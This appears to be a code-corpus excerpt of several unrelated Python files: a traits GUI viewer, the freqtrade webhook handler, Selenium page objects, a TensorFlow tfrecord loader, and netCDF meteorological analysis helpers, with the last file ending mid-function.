content
stringlengths 5
1.05M
|
|---|
"""The Galaxy Tool Shed application."""
from galaxy.web.framework import url_for
from galaxy.web.framework.decorators import expose
__all__ = ("url_for", "expose")
|
import numpy as np
from traits.api import Instance, Float, Enum, Any, List, on_trait_change, Event, Str, Property, Button
from traitsui.api import View, UItem, VSplit, CustomEditor, HSplit, Group, VGroup, HGroup, Label, ListEditor, \
EnumEditor
from collections import OrderedDict
from pyqtgraph.Qt import QtGui
from pyqtgraph.colormap import listMaps, get as get_colormap
from .helpers import PersistentWindow, CurveManager
from .h5scroller import FastScroller
from .curve_collections import PlotCurveCollection
from .modules import *
def setup_qwidget_control(parent, editor):
widget = editor.object.graph
return widget
class VisWrapper(PersistentWindow):
graph = Instance(QtGui.QWidget)
x_scale = Float
_y_spacing_enum = Enum(200, [0, 20, 50, 100, 200, 500, 1000, 2000, 5000, 'entry'])
_y_spacing_entry = Float(0.0)
auto_space = Button('Auto y-space')
auto_clim = Button('Auto colorbar')
colormap = Enum('coolwarm', listMaps(source='matplotlib'))
y_spacing = Property
vis_rate = Float
chan_map = Any
region = Event
clear_selected_channels = Button('Clear selected')
curve_editor_popup = Button('Curve settings')
# _plot_overlays = List(Str)
# active_channels_set = Str('all')
curve_manager = Instance(CurveManager)
modules = List([IntervalTraces,
AnimateInterval,
IntervalSpectrum,
IntervalSpectrogram,
SpatialVariance])
recording = Str
def __init__(self, qtwindow: FastScroller, **traits):
self._qtwindow = qtwindow
# Filter this keyword argument: this class can be called with "y_spacing" specified, even
# though the "y_spacing" property on this class is read-only.
dy = traits.pop('y_spacing', 100)
traits['_y_spacing_enum'] = dy
traits['vis_rate'] = 1 / qtwindow.curve_manager.source_curve.dx
traits['curve_manager'] = qtwindow.curve_manager
traits['graph'] = qtwindow.win
super(VisWrapper, self).__init__(**traits)
self._change_colormap()
# self._plot_overlays = ['all', 'selected']
# self.overlay_lookup = dict(all=qtwindow.curve_collection,
# selected=qtwindow.selected_curve_collection)
qtwindow.region.sigRegionChanged.connect(self._region_did_change)
qtwindow.curve_manager.source_curve.vis_rate_changed.connect(self._follow_vis_rate)
self._make_modules()
# This is here only to announce to traits callbacks that the region has changed
def _region_did_change(self):
self.region = True
def _follow_vis_rate(self, rate):
self.vis_rate = rate
def _make_modules(self):
mods = self.modules[:]
self.modules_by_name = OrderedDict()
for m in mods:
module = m(parent=self, chan_map=self.chan_map, curve_manager=self.curve_manager)
self.modules_by_name[module.name] = module
self.modules = list(self.modules_by_name.values())
def _get_y_spacing(self):
if self._y_spacing_enum == 'entry':
return float(self._y_spacing_entry)
else:
return float(self._y_spacing_enum)
def _auto_space_fired(self):
y = self.curve_manager.source_curve.current_data(visible=True)[1]
dy = np.median(y.ptp(axis=1)) * 1e6 * 0.25
if round(dy) >= 1:
dy = round(dy)
self._y_spacing_enum = 'entry'
self._y_spacing_entry = dy
def _auto_clim_fired(self):
image = self._qtwindow.img.image
mn, mx = np.nanpercentile(image, [2, 98])
# If bipolar, keep +/- limits same magnitude
if mn * mx > 0:
limits = mn, mx
else:
mx = max(np.abs(mn), np.abs(mx))
limits = -mx, mx
self._qtwindow.cb.setLevels(values=limits)
@on_trait_change('_y_spacing_enum')
def _change_spacing(self):
self._qtwindow.update_y_spacing(self.y_spacing * 1e-6)
@on_trait_change('_y_spacing_entry')
def _change_spacing_from_entry(self):
# only change data if we're in entry mode
if self.y_spacing == self._y_spacing_entry:
self._change_spacing()
def _clear_selected_channels_fired(self):
self.curve_manager.curves_by_name('selected').set_selection(None)
def _curve_editor_popup_fired(self):
# curve_tool = CurveColorSettings(self.overlay_lookup)
curve_tool = self.curve_manager
v = curve_tool.default_traits_view()
v.kind = 'live'
curve_tool.edit_traits(view=v)
@on_trait_change('colormap')
def _change_colormap(self):
cmap = get_colormap(self.colormap, source='matplotlib')
self._qtwindow.cb.setCmap(cmap)
# self._qtwindow.img.setLookupTable(cmap)
def default_traits_view(self):
ht = 1000
v = View(
VSplit(
UItem('graph',
editor=CustomEditor(setup_qwidget_control),
resizable=True,
#height=(ht-150)),
height=0.85),
HSplit(
Group(HGroup(VGroup(Label('Trace spacing (uV)'),
UItem('_y_spacing_enum', resizable=True),
Label('Enter spacing (uV)'),
UItem('_y_spacing_entry'),
UItem('auto_space')),
VGroup(Label('Heatmap curves'),
UItem('object.curve_manager.heatmap_name',
editor=EnumEditor(name='object.curve_manager._curve_names')),
Label('Color map'),
UItem('colormap'),
UItem('auto_clim'))),
HGroup(VGroup(UItem('clear_selected_channels'),
UItem('curve_editor_popup')),
VGroup(Label('Interactive curves'),
UItem('object.curve_manager.interactive_name',
editor=EnumEditor(name='object.curve_manager._curve_names')))),
HGroup(Label('Vis. sample rate'), UItem('vis_rate', style='readonly'))),
UItem('modules', style='custom', resizable=True,
editor=ListEditor(use_notebook=True,
deletable=False,
dock_style='tab',
page_name='.name'),
# height=-150
),
)
),
width=1200,
height=ht,
resizable=True,
title=self.recording
)
return v
|
"""
This module manages webhook communication
"""
import logging
from typing import Any, Dict
from requests import RequestException, post
from freqtrade.enums import RPCMessageType
from freqtrade.rpc import RPC, RPCHandler
logger = logging.getLogger(__name__)
logger.debug('Included module rpc.webhook ...')
class Webhook(RPCHandler):
""" This class handles all webhook communication """
def __init__(self, rpc: RPC, config: Dict[str, Any]) -> None:
"""
Init the Webhook class, and init the super class RPCHandler
:param rpc: instance of RPC Helper class
:param config: Configuration object
:return: None
"""
super().__init__(rpc, config)
self._url = self._config['webhook']['url']
self._format = self._config['webhook'].get('format', 'form')
if self._format != 'form' and self._format != 'json':
raise NotImplementedError('Unknown webhook format `{}`, possible values are '
'`form` (default) and `json`'.format(self._format))
def cleanup(self) -> None:
"""
Cleanup pending module resources.
This will do nothing for webhooks, they will simply not be called anymore
"""
pass
def send_msg(self, msg: Dict[str, Any]) -> None:
""" Send a message to telegram channel """
try:
if msg['type'] == RPCMessageType.BUY:
valuedict = self._config['webhook'].get('webhookbuy', None)
elif msg['type'] == RPCMessageType.BUY_CANCEL:
valuedict = self._config['webhook'].get('webhookbuycancel', None)
elif msg['type'] == RPCMessageType.BUY_FILL:
valuedict = self._config['webhook'].get('webhookbuyfill', None)
elif msg['type'] == RPCMessageType.SELL:
valuedict = self._config['webhook'].get('webhooksell', None)
elif msg['type'] == RPCMessageType.SELL_FILL:
valuedict = self._config['webhook'].get('webhooksellfill', None)
elif msg['type'] == RPCMessageType.SELL_CANCEL:
valuedict = self._config['webhook'].get('webhooksellcancel', None)
elif msg['type'] in (RPCMessageType.STATUS,
RPCMessageType.STARTUP,
RPCMessageType.WARNING):
valuedict = self._config['webhook'].get('webhookstatus', None)
else:
raise NotImplementedError('Unknown message type: {}'.format(msg['type']))
if not valuedict:
logger.info("Message type '%s' not configured for webhooks", msg['type'])
return
payload = {key: value.format(**msg) for (key, value) in valuedict.items()}
self._send_msg(payload)
except KeyError as exc:
logger.exception("Problem calling Webhook. Please check your webhook configuration. "
"Exception: %s", exc)
def _send_msg(self, payload: dict) -> None:
"""do the actual call to the webhook"""
try:
if self._format == 'form':
post(self._url, data=payload)
elif self._format == 'json':
post(self._url, json=payload)
else:
raise NotImplementedError('Unknown format: {}'.format(self._format))
except RequestException as exc:
logger.warning("Could not call webhook url. Exception: %s", exc)
|
from apps.accounts.models import User
from selenium.webdriver.common.by import By
from functional_tests.pages.base import QcatPage
class QuestionnaireStepPage(QcatPage):
route_name = ''
LOC_BUTTON_SUBMIT = (By.ID, 'button-submit')
LOC_IMAGE_FOCAL_POINT_TARGET = (By.ID, 'id_qg_image-0-image_target')
LOC_LINK_ENTRIES = (By.XPATH, '//div[@class="link-preview"]/div')
LOC_LINK_ENTRY = (
By.XPATH,
'//div[@class="link-preview"]/div[text()="{link_text}"]')
LOC_LINK_ENTRY_REMOVE = (
By.XPATH, '(//div[@class="link-preview"])[{index}]//'
'a[@class="close"]') # 1-based!
LOC_LINK_ADD_MORE = (
By.XPATH, '//a[@data-questiongroup-keyword="{questiongroup}" and '
'@data-add-item]')
LOC_INPUT_SEARCH_LINK = (
By.XPATH, '(//div[contains(@class, "link-search") and not(contains('
'@style, "display: none;"))])[1]/input[contains(@class, '
'"link-search-field")]')
LOC_INPUT_SEARCH_USER = (
By.XPATH,
'(//input[contains(@class, "user-search-field")])[{index}]') # 1-based!
LOC_RADIO_SEARCH_USER = (
By.XPATH, '//input[@name="form-user-radio" and @value="search"]')
LOC_LOADING_SEARCH_USER = (By.CLASS_NAME, 'form-user-search-loading')
LOC_DISPLAY_SEARCH_USER = (
By.XPATH,
'//div[contains(@class, "alert-box") and contains(text(), "{name}")]')
LOC_REMOVE_SEARCH_USER = (
By.XPATH,
'//div[contains(@class, "alert-box") and contains(text(), "{name}")]/a')
LOC_BUTTON_BACK_WITHOUT_SAVING = (
By.XPATH, '//a[@class="wizard-header-back"]')
LOC_MODAL_TRANSLATION_WARNING = (By.ID, 'modal-translation-warning')
LOC_MODAL_TRANSLATION_CONFIRM_CREATE = (
By.CLASS_NAME, 'close-modal-translation-confirm-create')
LOC_BUTTON_TRANSLATION_WARNING_BACK = (
By.ID, 'modal-translation-warning-back')
LOC_BUTTON_TRANSLATION_WARNING_CONTINUE = (
By.CLASS_NAME, 'close-modal-translation-warning')
def is_focal_point_available(self):
# The script to set the focus point for the image is loaded, and the
# hidden field is in the DOM.
self.browser.execute_script("return $.addFocusPoint();")
self.exists_el(self.LOC_IMAGE_FOCAL_POINT_TARGET)
def enter_text(self, locator: tuple, text: str, clear: bool=False):
el = self.get_el(locator)
if clear is True:
el.clear()
el.send_keys(text)
def submit_step(self, driver, confirm_add_translation: bool=False):
elm = self.get_el(self.LOC_BUTTON_SUBMIT)
driver.execute_script("arguments[0].click();", elm)
if confirm_add_translation:
self.wait_for_modal()
elm = self.get_el(self.LOC_MODAL_TRANSLATION_CONFIRM_CREATE)
driver.execute_script("arguments[0].click();", elm)
assert self.has_success_message()
def back_without_saving(self, driver):
elm = self.get_el(self.LOC_BUTTON_BACK_WITHOUT_SAVING)
driver.execute_script("arguments[0].click();", elm)
def check_links(self, link_list: list, count: bool=True) -> bool:
found_links = []
for link in link_list:
link_el = self.get_el(
self.format_locator(self.LOC_LINK_ENTRY, link_text=link))
found_links.append(link_el)
if count is True:
return len(self.get_els(self.LOC_LINK_ENTRIES)) == len(found_links)
return True
def delete_link(self, index: int):
elm = self.get_el(
self.format_locator(self.LOC_LINK_ENTRY_REMOVE, index=index+1)
)
self.browser.execute_script("arguments[0].click();", elm)
def add_link(self, qg_keyword: str, link_name: str, add_more: bool=False):
if add_more is True:
elm = self.get_el(
self.format_locator(
self.LOC_LINK_ADD_MORE, questiongroup=qg_keyword)
)
self.browser.execute_script("arguments[0].click();", elm)
self.get_el(self.LOC_INPUT_SEARCH_LINK).send_keys(link_name)
self.select_autocomplete(self.browser, link_name)
def get_user_search_field(self, index: int=1):
return self.get_el(
self.format_locator(self.LOC_INPUT_SEARCH_USER, index=index))
def has_selected_user(self, user: User):
return self.exists_el(
self.format_locator(
self.LOC_DISPLAY_SEARCH_USER, name=user.get_display_name()))
def select_user(self, user: User, index: int=1):
search_field = self.get_user_search_field(index=index)
search_field.send_keys(user.firstname)
self.select_autocomplete(user.get_display_name())
self.wait_for(self.LOC_LOADING_SEARCH_USER, visibility=False)
def remove_selected_user(self, user: User):
self.get_el(
self.format_locator(
self.LOC_REMOVE_SEARCH_USER, name=user.get_display_name())
).click()
def has_translation_warning(self):
return self.exists_el(self.LOC_MODAL_TRANSLATION_WARNING)
def translation_warning_click_go_back(self, driver):
elm = self.get_el(self.LOC_BUTTON_TRANSLATION_WARNING_BACK)
driver.execute_script("arguments[0].click();", elm)
def translation_warning_click_continue(self, driver):
elm = self.get_el(self.LOC_BUTTON_TRANSLATION_WARNING_CONTINUE)
driver.execute_script("arguments[0].click();", elm)
#self.wait_for_modal(visibility=False)
|
import glob
from typing import Dict, Union, List
from pathlib import Path
import pandas as pd
import numpy as np
import tensorflow as tf
def load_dataset(
data_details: Dict,
batch_size: int,
file_ffps: Union[List[str], np.ndarray] = None,
data_dirs: Union[Path, List[Path]] = None,
file_filter: str = "*.tfrecord",
recursive: bool = False,
shuffle_buffer: Union[int, None] = 1_000_000,
n_open_files: int = 32,
block_size: int = 256,
n_parallel_calls: Union[int, None] = tf.data.experimental.AUTOTUNE
):
"""Performs the loading and parsing of a tensorflow dataset from
the .tfrecord files in the given directory
Parameters
----------
data_details: dictionary
Specifies how to parse the data,
see https://www.tensorflow.org/api_docs/python/tf/io/parse_example?hl=en
for more details
batch_size: int
Batch size, has to be done at this step as parsing of batches is
much more efficient when using batches compared to single entries
file_ffps: list of strings, optional
The files that make up the database
Either data_dirs (with file_filter) or file_ffps have to be given
data_dirs: Path, list of Path, optional
Directory that contains the .tfrecord files to use
Either data_dirs (with file_filter) or file_ffps have to be given
file_filter: str, optional
The file filter to use when searching the
specified directory for records
recursive: bool, optional
If specified then a recursive search is performed in each data_dir using the
specified file_filter.
No effect if file_ffps are given
shuffle_buffer: int, optional
Size of the shuffle buffer (in number of entries) to use,
defaults to 1 Million
If set to None, no shuffling is performed, however data is still loaded
from multiple .tfrecord files at once (due to interleave) meaning that
the data is still kinda "shuffled"
n_open_files: int, optional
How many .tfrecord files to read concurrently using the interleave
function (https://www.tensorflow.org/api_docs/python/tf/data/Dataset#interleave)
block_size: int, optional
Determines how many records are loaded from a .tfrecord file in one
interleave cycle
Default value should be fine, increasing it will make load times faster,
however if the shuffle buffer is not appropriately sized then this may
result in badly shuffled data
n_parallel_calls: int, optional
Number of parallel calls to use for interleave and parsing,
default is tf.data.experimental.AUTOTUNE, which lets tensorflow determine the
best number of calls to use.
If sequential processing is required, then set this to None
Returns
-------
tf.data.Dataset
Note: The dataset will not return single training samples,
but instead batches of batch_size!
"""
# Either data_dirs (with file_filter) or file_ffps have to be given
assert file_ffps is not None or data_dirs is not None
if file_ffps is None:
file_patterns = (
[str(cur_dir / file_filter) for cur_dir in data_dirs]
if isinstance(data_dirs, list)
else [str(data_dirs / file_filter)]
)
file_ffps = np.concatenate(
[
glob.glob(cur_file_pattern, recursive=recursive)
for cur_file_pattern in file_patterns
]
)
def _parse_fn(example_proto):
parsed = tf.io.parse_example(example_proto, data_details)
return parsed
# 1) Create a dataset from the files, the shuffle option
# means that the order of the files is shuffled every repeat (i.e. epoch) of the
# dataset
ds = tf.data.Dataset.from_tensor_slices(file_ffps).shuffle(
len(file_ffps), reshuffle_each_iteration=True
)
# 2) Uses interleave cycle through the n_open_files .tfrecord files and feed one
# one serialized sample into the shuffle buffer, opening new the next .tfrecord file
# once one runs out of samples
# 3) Shuffles all samples in the buffer and adding more into the buffer
# as samples are removed
# 4) Batch
# 5) Parse each batch
ds = ds.interleave(
lambda f: tf.data.TFRecordDataset(f),
num_parallel_calls=n_parallel_calls,
cycle_length=n_open_files,
block_length=block_size,
deterministic=False,
)
if shuffle_buffer is not None:
ds = ds.shuffle(shuffle_buffer)
ds = ds.batch(batch_size).map(
_parse_fn, num_parallel_calls=n_parallel_calls
)
return ds
def load_tfrecord(record_ffp: str, data_details: Dict, batch_size: int = 10_000):
"""
Loads a single tfrecord file as a dictionary
Parameters
----------
record_ffp: string
Path to the .tfrecord file
data_details: dictionary
Contains the data details required for loading
batch_size: int, optional
The batch size used for loading, this has to exceed the number samples
in the .tfrecord file
Returns
-------
dictionary:
Data from the specified .tfrecord file
"""
ds = tf.data.TFRecordDataset(filenames=[record_ffp])
def _parse_fn(example_proto):
parsed = tf.io.parse_example(example_proto, data_details)
return parsed
# Slight hack, just want to parse the whole record in one go,
# not sure how to do this without batching...
ds = ds.batch(batch_size).map(
_parse_fn, num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return next(ds.as_numpy_iterator())
def load_tfrecord_df(record_ffp: str, data_details: Dict, batch_size: int = 10_000):
"""
Loads a single tfrecord file as a dataframe
Parameters
----------
record_ffp: string
Path to the .tfrecord file
data_details: dictionary
Contains the data details required for loading
batch_size: int, optional
The batch size used for loading, this has to exceed the number samples
in the .tfrecord file
Returns
-------
dataframe:
Data from the specified .tfrecord file
"""
data = load_tfrecord(record_ffp, data_details, batch_size=batch_size)
df = pd.DataFrame.from_dict(data)
df.id = df.id.str.decode("UTF-8")
df = df.set_index("id")
return df
|
"""Define the aiowatttime package."""
from .client import Client # noqa
|
import numpy as np
from netCDF4 import Dataset
from datetime import datetime
from datetime import timedelta
import os
import sys
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap
from scipy import ndimage
import matplotlib.colors as mcolors
p00 = 100000.00 # hPa
Rd = 287.04
Rv = 461.51
epsilon = Rd / Rv
cp = 1004.0
grav = 9.81
r2DX = 0.5 / (18000.0)
rDX = 1.0 / (18000.0)
t0 = 273.15
def convolve_ave( var2d, kernel):
return( ndimage.convolve( var2d, kernel, mode='reflect' ) )
def get_lonlat( INFO, stime=datetime(2018,7,1), ):
mem = str(1).zfill(4)
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
with Dataset( fn, "r", format="NETCDF4") as nc:
lon = nc.variables["lon"][:]
lat = nc.variables["lat"][:]
return( lon, lat )
def prep_proj_multi( METHOD, axs, res="c", ll_lon=120, ur_lon=150, ll_lat=20, ur_lat=50,
fs=10,zorder=2,contc='burlywood',cont_alp=0.2, cc='k' ):
# print("proj")
ddeg = 0.2 # deg
lat2 = 40.0
blon = 138.0
blat = 36.3
m_l = []
#contc = 'lightgrey'
contc = contc
pdlat = 5.0
pdlon = 5.0
#pdlat = 1.0
#pdlon = 2.0
lc = 'k'
fs = fs
lw = 0.1
for ax in axs:
m = Basemap(projection=METHOD,resolution = res,
llcrnrlon = ll_lon,llcrnrlat = ll_lat,
urcrnrlon = ur_lon,urcrnrlat = ur_lat,
lat_0 = blat, lat_1 = lat2,
lat_2 = lat2, lon_0 = blon,
ax = ax)
m_l.append(m)
m.drawcoastlines(linewidth = 0.5, color = cc, zorder=zorder)
m.fillcontinents(color=contc,lake_color='w', zorder=0, alpha =cont_alp)
m.drawparallels(np.arange(0,70,pdlat),labels=[1,0,0,0],fontsize=fs,color=lc,linewidth=lw)
m.drawmeridians(np.arange(0,180,pdlon),labels=[0,0,0,1],fontsize=fs,color=lc,linewidth=lw)
return( m_l )
def get_arain_t( INFO, stime=datetime(2018,7,1),
adt=timedelta(hours=24), m=1 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
adts = adt.total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
fts = nc.variables["time"][:]
dt = int( adts / ( fts[2] - fts[1] ) )
rain_ = nc.variables["PREC"][:,:,:]*21600
rain_[ rain_ < 0.0 ] = 0.0
tmax = rain_.shape[0] // dt
rain = np.zeros( (tmax, rain_.shape[1], rain_.shape[2]) )
vtime_l = [0] * tmax
tt = 0
for t, ft in enumerate(fts):
if ft == 0.0:
continue
tt = (t-1) // dt
rain[tt, :,:] += rain_[t,:,:]
vtime_l[tt] = stime + timedelta( seconds=ft )
# print( t, tt, ft )
return( rain, vtime_l )
def get_arain( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1),
adt=timedelta(hours=24), m=1 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
# print( fn )
ft_max = ( vtime - stime ).total_seconds()
ft_min = ( vtime - adt - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
fts = nc.variables["time"][:]
# print("time", fts/3600)
idx_s = np.abs( ( fts - ft_min ) ).argmin()
idx_e = np.abs( ( fts - ft_max ) ).argmin()
#
rain = np.sum( nc.variables["PREC"][idx_s+1:idx_e+1,:,:], axis=0 )*21600
if ft_min < 0:
rain[:] = np.nan
# print( rain.shape )
# print( ft_max, ft_min, idx_s, idx_e )
# print( stime + timedelta( seconds=fts[idx_s+1]),
# stime + timedelta( seconds=fts[idx_e+1]) )
# print( fts[idx_s:idx_e]/3600)
return( rain )
def get_mslp( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
# print("time", fts/3600)
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
mslp = nc.variables["MSLP"][idx_e,:,:]
except:
print( "No time" )
mslp = nc.variables["MSLP"][:,:]
return( mslp )
def get_gph( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
#print(fn)
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
prs = nc.variables["pressure"][:] # hPa
idx_v = np.abs( ( prs - hpa ) ).argmin()
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
gph = nc.variables["Gprs"][idx_e,idx_v,:,:]
except:
print( "No time" )
gph = nc.variables["Gprs"][idx_v,:,:]
#
return( gph )
def get_prsvar( INFO, nvar="Vprs", stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
#print(fn)
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
prs = nc.variables["pressure"][:] # hPa
idx_v = np.abs( ( prs - hpa ) ).argmin()
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
var = nc.variables[nvar][idx_e,idx_v,:,:]
except:
print( "No time" )
var = nc.variables[nvar][idx_v,:,:]
return( var )
def get_the( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
#print(fn)
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
prs = nc.variables["pressure"][:] # hPa
idx_v = np.abs( ( prs - hpa ) ).argmin()
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
tk_ = nc.variables["Tprs"][idx_e,idx_v,:,:]
qv_ = nc.variables["QVprs"][idx_e,idx_v,:,:]
except:
print( "No time" )
tk_ = nc.variables["Tprs"][idx_v,:,:]
qv_ = nc.variables["QVprs"][idx_v,:,:]
eprs_ = qv_ * hpa*1.e2 / ( epsilon + qv_ )
tast_ = 2840.0 / (3.5 * np.log( tk_ ) - np.log(hpa*1.e2 * 0.01) - 4.805) + 55.0
the = tk_ * np.power(p00 / (hpa*1.e2), 0.2854 * (1.0 - 0.28*qv_)) * np.exp(qv_ * (1.0 + 0.81 * qv_) * (3376.0 / tast_ - 2.54))
the[ (the > 1000.0) | (the < 0.0 )] = np.nan
return( the )
def get_the_grad( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
the = get_the( INFO, stime=stime, vtime=vtime, m=m, hpa=hpa )
if the.ndim == 2:
[ the_y, the_x ] = np.gradient( the, axis=(0,1) )
elif the.ndim == 3:
[ the_y, the_x ] = np.gradient( the, axis=(1,2) )
else:
print( "Error" )
sys.exit()
#return( the_x*r2DX, the_y*r2DX )
return( the_x*rDX, the_y*rDX )
def get_mf_grad( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
q_ = get_prsvar( INFO, nvar="QVprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
u_ = get_prsvar( INFO, nvar="QVprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
v_ = get_prsvar( INFO, nvar="QVprs", stime=stime, vtime=vtime, m=m, hpa=hpa )
[ dqvdy, _ ] = np.gradient( q_*v_, axis=(0,1) )
[ _, dqudx ] = np.gradient( q_*u_, axis=(0,1) )
return( ( dqvdy+dqudx ) * rDX )
def get_rh( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1, hpa=500 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
#print(fn)
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
prs = nc.variables["pressure"][:] # hPa
idx_v = np.abs( ( prs - hpa ) ).argmin()
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
tk_ = nc.variables["Tprs"][idx_e,idx_v,:,:]
qv_ = nc.variables["QVprs"][idx_e,idx_v,:,:]
except:
print( "No time" )
tk_ = nc.variables["Tprs"][idx_v,:,:]
qv_ = nc.variables["QVprs"][idx_v,:,:]
# Teten's formula
rh_ = 611.2 * np.exp( 17.67*( tk_ - t0 ) / ( tk_ - t0 + 243.5 ) )
rh_ = epsilon * rh_ / ( hpa*1.e2 - rh_ )
rh_ = qv_ / rh_
rh_[ rh_ < 0.0 ] = np.nan
return( rh_ )
def get_ki( INFO, stime=datetime(2018,7,1), vtime=datetime(2018,7,1), m=1 ):
mem = str(m).zfill(4)
if m == 0:
mem = "mean"
fn = os.path.join( INFO["TOP"], stime.strftime('%Y%m%d%H%M%S'), "fcst_sno_np00001",
mem, "p_history.pe000000.nc" )
#print(fn)
ft_max = ( vtime - stime ).total_seconds()
with Dataset( fn, "r", format="NETCDF4") as nc:
prs = nc.variables["pressure"][:] # hPa
idx_v850 = np.abs( ( prs - 850 ) ).argmin()
idx_v700 = np.abs( ( prs - 700 ) ).argmin()
idx_v500 = np.abs( ( prs - 500 ) ).argmin()
try:
fts = nc.variables["time"][:]
idx_e = np.abs( ( fts - ft_max ) ).argmin()
tk850_ = nc.variables["Tprs"][idx_e,idx_v850,:,:]
tk700_ = nc.variables["Tprs"][idx_e,idx_v700,:,:]
tk500_ = nc.variables["Tprs"][idx_e,idx_v500,:,:]
qv850_ = nc.variables["QVprs"][idx_e,idx_v850,:,:]
qv700_ = nc.variables["QVprs"][idx_e,idx_v700,:,:]
except:
print( "No time" )
tk850_ = nc.variables["Tprs"][idx_v850,:,:]
tk700_ = nc.variables["Tprs"][idx_v700,:,:]
tk500_ = nc.variables["Tprs"][idx_v500,:,:]
qv850_ = nc.variables["QVprs"][idx_v850,:,:]
qv700_ = nc.variables["QVprs"][idx_v700,:,:]
# Teten's formula
e700_ = qv700_ * 700.0 / ( epsilon + qv700_ ) # mb
td700_ = ( 243.5 * np.log( e700_) - 440.8 ) / ( 19.48 - np.log( e700_ ) ) + t0
e850_ = qv850_ * 850.0 / ( epsilon + qv850_ ) # mb
td850_ = ( 243.5 * np.log( e850_ ) - 440.8 ) / ( 19.48 - np.log( e850_ ) ) + t0
ki = tk850_ - tk500_ + td850_ - ( tk700_ - td700_ ) - t0 # (deg C)
return( ki )
def get_grads_JMA(itime,FT,ACUM):
print("get_JMA",itime)
JMAr_gx = 2560
JMAr_gy = 3360
JMAr_top = "/data11/honda/SCALE-LETKF/JMA/radar/grads"
jetime = itime + timedelta(seconds=3600) * FT
jstime = itime + timedelta(seconds=600)
if not ACUM:
jstime += timedelta(seconds=3600) * (FT - 1)
print(jstime,jetime)
JMA_data_npz = os.path.join( JMAr_top, itime.strftime('%Y/%m/%d'),
"jmaradar_" + jstime.strftime('%Y%m%d%H%M%S') + "-" + jetime.strftime('%Y%m%d%H%M%S') + ".npz" )
JMA_data_nc = os.path.join( JMAr_top, itime.strftime('%Y/%m/%d'),
"jmaradar_" + jstime.strftime('%Y%m%d%H%M%S') + "-" + jetime.strftime('%Y%m%d%H%M%S') + ".nc" )
latmax = 20.004167 + 0.008333 * (JMAr_gy-1)
JMAr_lat = np.arange(20.004167, latmax,0.008333)
lonmax = 118.006250 + 0.012500 * (JMAr_gx-1)
JMAr_lon = np.arange(118.006250, lonmax,0.012500)
# npz is available?
ISNPZ = os.path.isfile(JMA_data_npz)
# nc is available?
ISNC = os.path.isfile(JMA_data_nc)
if ISNC:
JMArain2d,JMAr_lon,JMAr_lat = read_JMA_nc(JMA_data_nc)
return JMArain2d,JMAr_lon,JMAr_lat
if ISNPZ and not ISNC:
JMArain2d = np.load(JMA_data_npz)['arr_0']
print("read JMA data from: ", JMA_data_npz)
write_JMA_nc(JMA_data_nc,JMAr_lon,JMAr_lat,jstime,JMArain2d)
elif not ISNPZ and not ISNC:
JMArain2d = np.zeros((JMAr_gy,JMAr_gx))
jtime2 = jstime
while (jtime2 <= jetime):
jtime1 = jtime2 - timedelta(seconds=600)
fn1 = os.path.join( JMAr_top, jtime1.strftime('%Y/%m/%d'),
"jmaradar_" + jtime1.strftime('%Y%m%d%H%M%S') + ".grd")
fn2 = os.path.join( JMAr_top, jtime2.strftime('%Y/%m/%d'),
"jmaradar_" + jtime2.strftime('%Y%m%d%H%M%S') + ".grd")
for fn in fn1,fn2:
try:
infile = open(fn)
except:
print("Failed to open",fn)
sys.exit()
